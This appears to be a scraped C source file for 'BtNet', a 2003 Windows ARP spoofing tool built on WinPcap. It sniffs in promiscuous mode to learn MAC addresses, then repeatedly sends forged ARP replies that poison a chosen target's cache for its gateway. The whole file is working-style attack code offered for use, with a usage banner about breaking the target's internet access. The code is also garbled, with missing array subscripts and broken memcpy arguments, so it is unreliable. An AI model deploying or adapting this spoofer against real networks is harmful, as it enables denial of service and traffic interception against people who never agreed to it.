📄 vv.c
字号:
#include <packet32.h>
#include "ntddndis.h"
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 //arp请求包
#define ARP_REPLY 0x0002 //arp应答包
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10
#pragma pack(push,1)
typedef struct ethdr
{
unsigned char eh_dst[6]; //以太网目的地址
unsigned char eh_src[6]; //以太网源地址
unsigned short eh_type; //
}ETHDR,*PETHDR;
typedef struct arphdr //arp头
{
unsigned short arp_hdr; //硬件类型
unsigned short arp_pro; //协议类型
unsigned char arp_hln; //硬件地址长度
unsigned char arp_pln; //协议地址长度
unsigned short arp_opt; //
unsigned char arp_sha[6]; //发送端以太网地址
unsigned long arp_spa; //发送端ip地址
unsigned char arp_tha[6]; //接收端以太网地址
unsigned long arp_tpa; //接收端ip地址
}ARPHDR,*PARPHDR;
typedef struct ip_mac
{
u_long ip;
unsigned char mac[6];
}IP_MAC,*PIP_MAC;
#pragma pack(push)
LPADAPTER lpAdapter;
char adapterlist[max_num_adapter][1024];
IP_MAC toipandmac;
IP_MAC oipandmac,myipandmac;
BOOL param6=FALSE;
char *noMACstr;
char noMAC[6][3];
u_long mytoIP,oIP;
BOOL sendtoOip;
MSG msg;
UINT newtimer;
char MYIP[20]="128.128.128.128";
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;
int getint(char c)
{
int t=-1;
if((c<=’9’)&&(c>=’0’))
t=c-’0’;
else if((c>=’a’)&&(c<=’f’))
t=10+c-’a’;
else if((c>=’A’)&&(c<=’F’))
t=10+c-’A’;
return t;
}
void start()
{
printf("BtNet //--an ARP Tool test the Windows Break the Internet\n");
printf("written by Ruder,10/2003\n");
printf("Homepage: http://xEyes.cdut.net/ruder/index.htm\;n");
printf("E-mail: cocoruder@163.com\n");
printf("\nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]\n");
printf("Example:\n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1\n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7c\n");
printf(" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
return ;
}
DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;
if((lppackets=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket send Error: %d\n",GetLastError());
return 0;
}
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}
if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return 0;
}
if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to set the timeout\n");
}
if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
return 0;
}
PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));
while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;
off=0;
while(off<ulbytesreceived)
{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;
pChar=(char *)(buf+off);
base=pChar;
off=Packet_WORDALIGN(off+hdr->bh_caplen);
eth=(PETHDR)pChar; //以太头
arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp头
int i;
if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));
printf("[IP]:");
printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
printf("[MAC]:");
for(i=0;i<5;i++)
{
printf("%.2x-",eth->eh_src);
}
printf("%.2x",eth->eh_src[5]);
printf("\n");
if (toipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
toipandmac.mac=eth->eh_src;
toipandmac_flag=TRUE;
}
if (oipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
oipandmac.mac=eth->eh_src;
oipandmac_flag=TRUE;
// printf("if you have get the MAC Addresses enough,Press any key for staring!\n");
}
if(myipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
myipandmac.mac=eth->eh_src;
myipandmac_flag=TRUE;
}
}
}
}
continue;
}
}
return 0;
}
DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
LPPACKET lpPacket;
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
u_long sendtoIP=*(u_long *)dwsendtoIP;
//struct sockaddr_in sin;
lpPacket = PacketAllocatePacket();
if(lpPacket==NULL)
{
printf("\nPacketAllocatePacket error!");
return 0;
}
eth.eh_type=htons(ETH_ARP);
for(i=0;i<6;i++)
{
eth.eh_dst=0xff;
eth.eh_src=0xa5;
arphdr.arp_sha=0xa5;
arphdr.arp_tha=0xff;
}
arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REQUEST);
arphdr.arp_hln=6;
arphdr.arp_pln=4;
arphdr.arp_tpa=htonl(sendtoIP);
arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));
if(sendtoOip)
{
if(myipandmac_flag)
{
for(i=0;i<6;i++)
{
eth.eh_src=myipandmac.mac;
arphdr.arp_sha=myipandmac.mac;
arphdr.arp_spa=htonl(myipandmac.ip);
//memset(MYIP,0,sizeof(MYIP));
}
}
else
{
printf("My MAC Address Can’t Find!\n");
return 0;
}
}
memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,e,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));
PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
return 0;
}
PacketFreePacket(lpPacket);
return 0;
}
DWORD WINAPI sendSR()
{
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
LPPACKET lpPacket;
unsigned char toMAC[6];
struct sockaddr_in sin;
u_long toIP=mytoIP;
//if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE))
//{
// printf("Can’t get all MAC address!\n");
// return 0;
//}
lpPacket = PacketAllocatePacket();
if(lpPacket == NULL)
{
printf("\nError:failed to allocate the LPPACKET structure.\n");
return 0;
}
if (toipandmac_flag==FALSE)
{
printf("Can’t get toMAC address!\n");
return 0;
}
memset(toMAC,0,sizeof(toMAC));
memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));
if (param6)
{
for(i=0;i<6;i++)
{
int t1,t2;
char c1,c2;
c1=noMAC[0];
c2=noMAC[1];
t1=getint(c1);
t2=getint(c2);
if((t1==-1)||(t2==-1))
{
printf("-m parameter error!\n");
return 0;
}
eth.eh_src=t1*16+t2;
eth.eh_dst=toMAC;
arphdr.arp_sha=t1*16+t2;
arphdr.arp_tha=toMAC;
}
}
else
{
for(i=0;i<6;i++)
{
eth.eh_src=toMAC;
eth.eh_dst=toMAC;
arphdr.arp_sha=toMAC;
arphdr.arp_tha=toMAC;
}
}
eth.eh_type=htons(ETH_ARP);
arphdr.arp_spa=htonl(oIP);
arphdr.arp_tpa=htonl(toIP);
arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REPLY);
arphdr.arp_hln=6;
arphdr.arp_pln=4;
memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,e,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));
PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
return 0;
}
PacketFreePacket(lpPacket);
sin.sin_addr.s_addr=arphdr.arp_tpa;
printf("spoof %s: ",inet_ntoa(sin.sin_addr));
sin.sin_addr.s_addr=arphdr.arp_spa;
printf("%s-->",inet_ntoa(sin.sin_addr));
for(i=0;i<5;i++)
printf("%.2x-",arphdr.arp_sha);
printf("%x",arphdr.arp_sha[5]);
printf("\n");
return 0;
}
DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
printf("Waiting spoof Start\n");
mytoIP=*(u_long *)dwtoIP;
newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR));
while(GetMessage(&msg,0,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}
int main(int argc,char *argv[])
{
HANDLE thread1,thread2,thread3;
WCHAR adaptername[8192];
WCHAR *name1,*name2;
ULONG adapterlength;
DWORD threadid1,threadid2,threadid3;
u_long toIP,myip;
struct NetType ntype;
struct sockaddr_in sin;
struct npf_if_addr ipbuff;
int adapternum=0,opti=0,open,i,j;
long npflen;
if((argc!=5)&&(argc!=7))
{
start();
return 0;
}
else if((strcmp(argv[1],"-h")!=0)||(strcmp(argv[3],"-o")!=0))
{
start();
return 0;
}
toIP=ntohl(inet_addr(argv[2]));
oIP=ntohl(inet_addr(argv[4]));
if (argv[5]!=NULL)
{
if (strcmp(argv[5],"-m")==0)
{
noMACstr=argv[6];
j=0;
for(i=0;i<6;i++)
{
memset(noMAC,0,sizeof(noMAC));
memcpy(noMAC,noMACstr,2);
noMACstr=noMACstr+3;
}
param6=TRUE;
}
}
printf("\nLibarary Version: %s",PacketGetVersion());
adapterlength=sizeof(adaptername);
if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) //得到网卡列表
{
printf("PacketGetAdapterNames Error: %d\n",GetLastError());
return -1;
}
name1=adaptername;
name2=adaptername;
i=0;
while((*name1!=’\0’) || (*(name1-1)!=’\0’))
{
if(*name1==’\0’)
{
memcpy(adapterlist,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
adapternum=i;
printf("\nAdapters Installed:\n");
for(i=0;i<adapternum;i++)
wprintf(L"%d - %s\n",i+1,adapterlist);
do
{
printf("\nSelect the number of the adapter to open: ");
scanf("%d",&open);
if(open>=1 && open<=adapternum)
break;
}while(open<1 || open>adapternum);
lpAdapter=PacketOpenAdapter(adapterlist[open-1]);
if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("PacketOpenAdapter Error: %d\n",GetLastError());
return -1;
}
if(PacketGetNetType(lpAdapter,&ntype))
{
printf("\n\t\t*** Host Information ***\n");
printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);
printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);
}
npflen=sizeof(ipbuff);
if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
{
sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));
sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));
sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));
myip=ntohl(sin.sin_addr.s_addr);
printf("[MACAddress:]");
}
else
{
printf("\nNot get enough data\n");
//PacketFreePacket(lppackets);
PacketCloseAdapter(lpAdapter);
return -1;
}
printf("\n");
oipandmac.ip=oIP;
toipandmac.ip=toIP;
myipandmac.ip=myip;
sendtoOip=FALSE;
thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
Sleep(300);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
Sleep(100);
CloseHandle(thread2);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
sendtoOip=TRUE;
Sleep(200);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
// WaitForSingleObject(thread1,INFINITE);
thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
WaitForSingleObject(thread3,INFINITE);
PacketCloseAdapter(lpAdapter);
return 0;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -